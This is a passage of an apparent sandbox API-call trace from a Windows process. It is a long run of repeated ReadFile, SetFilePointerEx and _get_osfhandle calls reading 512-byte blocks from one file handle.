nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.288] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.288] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.288] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.288] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.288] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.288] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.288] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.288] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.288] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.288] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.288] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.288] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.288] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.288] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.288] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.288] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.288] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.288] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.288] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.288] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.288] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.288] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.289] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.289] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.289] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.289] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.289] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.289] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.289] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.289] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.289] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.289] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.289] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.289] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.289] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.289] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.289] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.290] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.290] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.290] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.290] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.290] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.290] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.290] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.290] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.290] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.290] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.290] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.290] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.290] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.290] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.290] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.290] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.290] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.290] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.290] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.290] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.290] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.290] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.291] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.291] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.291] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.291] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.291] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.291] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.291] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.291] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.291] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.291] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.291] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.291] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.291] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.291] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.291] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.291] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.291] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.291] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.291] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.291] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.291] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.291] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.292] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.292] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.292] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.292] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.292] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.292] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.292] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.292] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.292] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.292] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.292] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.292] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.292] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.292] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.292] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.292] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.292] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.292] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.292] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.292] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.292] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.292] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.293] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.293] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.293] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.293] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.293] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.293] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.293] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.293] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.293] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.293] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.293] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.293] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.293] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.293] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.293] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.294] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.294] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.294] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.294] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.294] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.294] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.294] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.294] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.294] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.294] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.294] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.294] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.294] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.294] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.295] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.295] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.295] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.295] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.295] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.295] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.295] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.295] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.295] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.295] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.295] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.295] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.295] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.295] ReadFile (in: hFile=0x54, 